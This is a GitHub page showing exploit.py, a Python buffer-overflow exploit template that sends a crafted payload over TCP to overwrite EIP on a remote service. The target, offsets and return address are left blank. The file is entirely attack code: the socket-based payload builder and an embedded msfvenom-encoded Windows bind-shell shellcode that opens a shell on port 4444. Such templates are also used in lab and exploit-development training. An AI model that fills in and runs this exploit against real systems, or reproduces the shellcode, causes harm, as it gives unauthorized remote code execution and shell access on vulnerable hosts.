-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathexploit.py
executable file
·59 lines (51 loc) · 2.4 KB
/
exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
#!/usr/bin/python3
import socket
dest = ''
dport =
cmd = ''
total_bytes =
distance_to_eip =
eip_overwrite = '\x\x\x\x' # Remember endianess
end = '\r\n'
shellcode = '' # Shellcode can be omitted as a test, padding will be put in it's spot, as a placeholder
# The below should be okay
buffer_to_eip = distance_to_eip * 'A'
nop_sled = '\x90' * 16
break_instruction = '\xcc'
padding = 'F' * (total_bytes - distance_to_eip - len(eip_overwrite) - len(nop_sled) - len(break_instruction) - len(shellcode))
attack = cmd + buffer_to_eip + eip_overwrite + nop_sled + break_instruction + shellcode + padding + end
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((dest, dport))
s.recv(100)
s.sendall(attack.encode())
print(s.recv(100))
s.close()
# Sample shellcode generated via `msfvenom --payload windows/shell_bind_tcp -b '\x00' -e x86/shikata_ga_nai`
# This opens a bind shell on 4444
'''
("\xbb\xa1\x09\x04\x9a\xda\xdc\xd9\x74\x24\xf4\x5a\x2b\xc9\xb1"
"\x56\x31\x5a\x13\x83\xc2\x04\x03\x5a\xae\xeb\xf1\x66\x58\x62"
"\xf9\x96\x98\x15\x73\x73\xa9\x07\xe7\xf7\x9b\x97\x63\x55\x17"
"\x53\x21\x4e\xac\x11\xee\x61\x05\x9f\xc8\x4c\x96\x11\xd5\x03"
"\x54\x33\xa9\x59\x88\x93\x90\x91\xdd\xd2\xd5\xcc\x2d\x86\x8e"
"\x9b\x9f\x37\xba\xde\x23\x39\x6c\x55\x1b\x41\x09\xaa\xef\xfb"
"\x10\xfb\x5f\x77\x5a\xe3\xd4\xdf\x7b\x12\x39\x3c\x47\x5d\x36"
"\xf7\x33\x5c\x9e\xc9\xbc\x6e\xde\x86\x82\x5e\xd3\xd7\xc3\x59"
"\x0b\xa2\x3f\x9a\xb6\xb5\xfb\xe0\x6c\x33\x1e\x42\xe7\xe3\xfa"
"\x72\x24\x75\x88\x79\x81\xf1\xd6\x9d\x14\xd5\x6c\x99\x9d\xd8"
"\xa2\x2b\xe5\xfe\x66\x77\xbe\x9f\x3f\xdd\x11\x9f\x20\xb9\xce"
"\x05\x2a\x28\x1b\x3f\x71\x25\xe8\x72\x8a\xb5\x66\x04\xf9\x87"
"\x29\xbe\x95\xab\xa2\x18\x61\xcb\x99\xdd\xfd\x32\x21\x1e\xd7"
"\xf0\x75\x4e\x4f\xd0\xf5\x05\x8f\xdd\x20\x89\xdf\x71\x9a\x6a"
"\xb0\x31\x4a\x03\xda\xbd\xb5\x33\xe5\x17\xc0\x73\x2b\x43\x81"
"\x13\x4e\x73\x34\xb8\xc7\x95\x5c\x50\x8e\x0e\xc8\x92\xf5\x86"
"\x6f\xec\xdf\xba\x38\x7a\x57\xd5\xfe\x85\x68\xf3\xad\x2a\xc0"
"\x94\x25\x21\xd5\x85\x3a\x6c\x7d\xcf\x03\xe7\xf7\xa1\xc6\x99"
"\x08\xe8\xb0\x3a\x9a\x77\x40\x34\x87\x2f\x17\x11\x79\x26\xfd"
"\x8f\x20\x90\xe3\x4d\xb4\xdb\xa7\x89\x05\xe5\x26\x5f\x31\xc1"
"\x38\x99\xba\x4d\x6c\x75\xed\x1b\xda\x33\x47\xea\xb4\xed\x34"
"\xa4\x50\x6b\x77\x77\x26\x74\x52\x01\xc6\xc5\x0b\x54\xf9\xea"
"\xdb\x50\x82\x16\x7c\x9e\x59\x93\x8c\xd5\xc3\xb2\x04\xb0\x96"
"\x86\x48\x43\x4d\xc4\x74\xc0\x67\xb5\x82\xd8\x02\xb0\xcf\x5e"
"\xff\xc8\x40\x0b\xff\x7f\x60\x1e")
'''